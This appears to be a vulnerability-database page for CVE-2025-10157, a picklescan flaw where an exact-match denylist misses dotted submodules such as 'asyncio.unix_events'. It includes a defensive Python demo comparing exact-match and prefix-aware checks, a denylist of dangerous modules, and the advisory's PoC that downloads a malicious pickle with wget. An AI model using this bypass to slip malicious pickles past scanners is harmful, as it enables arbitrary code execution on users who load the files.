CVE-2025-10157
Published 2025-09-17. CVE-2025-10157: A Protection Mechanism Failure vulnerability in mmaitre314 picklescan versions up to and including 0.0.30 allows a remote attacker to bypass the unsafe globals…
Priority: P345 · CVSS 3.1 score: 7.8 (High) · Vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.76% (50.7th percentile)
A Protection Mechanism Failure vulnerability in mmaitre314 picklescan versions up to and including 0.0.30 allows a remote attacker to bypass the unsafe globals check. This is possible because the scanner performs an exact match for module names, allowing malicious payloads to be loaded via submodules of dangerous packages (e.g., 'asyncio.unix_events' instead of 'asyncio').
When a file that the scanner wrongly reported as safe is later unpickled, the payload it carries executes. The practical point for anyone writing or relying on such a scanner: a denylist keyed on exact module names must also match dotted submodules of a blocked package (`asyncio.unix_events` is as dangerous to import as `asyncio`), otherwise the check is sidestepped by a one-token change in the GLOBAL reference.
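To make the mechanism concrete, here is an added example (not picklescan's own code; the denylist, the helper names and the sample pickles are constructed for illustration, and picklescan's real list and its 0.0.31 fix may differ). It disassembles a pickle with `pickletools.genops`, pulls out the globals it references, and applies an exact-match check beside a prefix-aware one. The submodule reference from the PoC file name (`asyncio.unix_events._UnixSubprocessTransport`) slips past the first and is caught by the second. Nothing is unpickled, so it is safe to run.

```python
"""Exact-match vs prefix-aware unsafe-globals check for pickle streams.

Added example, NOT picklescan's code. UNSAFE_PACKAGES is a constructed subset
used only to demonstrate the bypass described in CVE-2025-10157.
"""
import pickletools

# Constructed denylist of top-level packages whose globals a scanner would reject.
UNSAFE_PACKAGES = {"os", "subprocess", "sys", "builtins", "asyncio"}

# Opcodes that push a string; STACK_GLOBAL (protocol 4+) takes its operands from these.
_STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
               "STRING", "BINSTRING", "SHORT_BINSTRING"}


def extract_globals(data: bytes) -> list:
    """Return (module, name) pairs referenced by GLOBAL / STACK_GLOBAL opcodes.

    pickletools.genops only disassembles the stream; it imports and executes
    nothing. STACK_GLOBAL resolution tracks string pushes only, which is enough
    for pickles written by the stdlib pickler (a simplification for this example).
    """
    strings, found = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":            # protocols 0-3: arg is "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name in _STRING_OPS:       # remember pushed strings for STACK_GLOBAL
            strings.append(arg)
        elif op.name == "STACK_GLOBAL":    # protocol 4+: pops name, then module
            name = strings.pop()
            module = strings.pop()
            found.append((module, name))
    return found


def exact_match_unsafe(module: str, name: str) -> bool:
    """The bypassed check: flags only when the module string is exactly denylisted."""
    return module in UNSAFE_PACKAGES


def prefix_aware_unsafe(module: str, name: str) -> bool:
    """Hardened check: the package itself or any dotted submodule of it is flagged."""
    return any(module == pkg or module.startswith(pkg + ".") for pkg in UNSAFE_PACKAGES)


def scan(data: bytes, checker) -> list:
    """Return the globals in `data` that `checker` would flag as unsafe."""
    return [(m, n) for m, n in extract_globals(data) if checker(m, n)]


def _global_p2(module: str, name: str) -> bytes:
    """Constructed protocol-2 pickle whose only payload is one GLOBAL reference."""
    return b"\x80\x02c" + module.encode() + b"\n" + name.encode() + b"\n."


def _global_p4(module: str, name: str) -> bytes:
    """Same reference encoded as SHORT_BINUNICODE x2 + STACK_GLOBAL (protocol 4)."""
    def su(s: str) -> bytes:
        b = s.encode()
        return b"\x8c" + bytes([len(b)]) + b          # 0x8c = SHORT_BINUNICODE
    return b"\x80\x04" + su(module) + su(name) + b"\x93."  # 0x93 = STACK_GLOBAL


# Constructed samples: a direct reference to the denylisted package, and the
# submodule reference named in the advisory's PoC file.
DIRECT_PICKLE = _global_p2("asyncio", "run")
BYPASS_PICKLE = _global_p2("asyncio.unix_events", "_UnixSubprocessTransport")
BYPASS_PICKLE_P4 = _global_p4("asyncio.unix_events", "_UnixSubprocessTransport")

if __name__ == "__main__":
    for label, blob in [("direct", DIRECT_PICKLE),
                        ("submodule", BYPASS_PICKLE),
                        ("submodule/p4", BYPASS_PICKLE_P4)]:
        print(f"{label:12} exact-match: {scan(blob, exact_match_unsafe)}"
              f"  prefix-aware: {scan(blob, prefix_aware_unsafe)}")
```

The prefix check must compare against `pkg + "."` rather than a bare `startswith(pkg)`, or `osmosis` would be flagged by `os`. A denylist fixed this way still only covers the packages it names; for model files, an allowlist of the few globals a legitimate checkpoint needs is the more defensible design.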
Affected (3 ranges, reported by different sources but equivalent: every release up to and including 0.0.30; fixed in 0.0.31)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mmaitre314 | picklescan | < 0.0.31 | 0.0.31 |
| mmaitre314 | picklescan | <= 0.0.30 | — |
| mmaitre314 | picklescan | >= 0 < 0.0.31 | 0.0.31 |
CVSS provenance
NVD, v3.1: 7.8 HIGH, CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
NVD, v4.0: 9.3 CRITICAL, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
The two vectors disagree on attack vector and user interaction: the v3.1 vector models a malicious file that a local user must choose to load (AV:L, UI:R), while the v4.0 vector models a model file fetched over the network and loaded with no interaction (AV:N, UI:N). Which reading applies depends on how scanned files reach the loader in a given pipeline.
OSV
Picklescan is Vulnerable to Unsafe Globals Check Bypass through Subclass Imports
osv · 2025-09-10 · CVE-2025-10157 · CRITICAL
### Summary
The vulnerability allows malicious actors to bypass PickleScan's unsafe globals check, leading to potential arbitrary code execution. The issue stems from PickleScan's strict check for full module names against its list of unsafe globals. By using subclasses of dangerous imports instead of the exact module names, attackers can circumvent the check and inject malicious payloads.
### PoC
1. Download a model that uses the `asyncio` package:
```sh
wget https://huggingface.co/iluem/linux_pkl/resolve/main/asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl
```
2. Check with PickleScan:
```sh
picklescan -p asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl -g
```
**Expected Result:**
GHSA
Picklescan is Vulnerable to Unsafe Globals Check Bypass through Subclass Imports
ghsa · 2025-09-10 · CVE-2025-10157 · CRITICAL · CWE-693 (Protection Mechanism Failure)
Advisory body identical to the OSV entry above.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
References:
- https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L309
- https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f7qq-56ww-84cr
- https://huggingface.co/iluem/linux_pkl/resolve/main/asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl
Published: 2025-09-17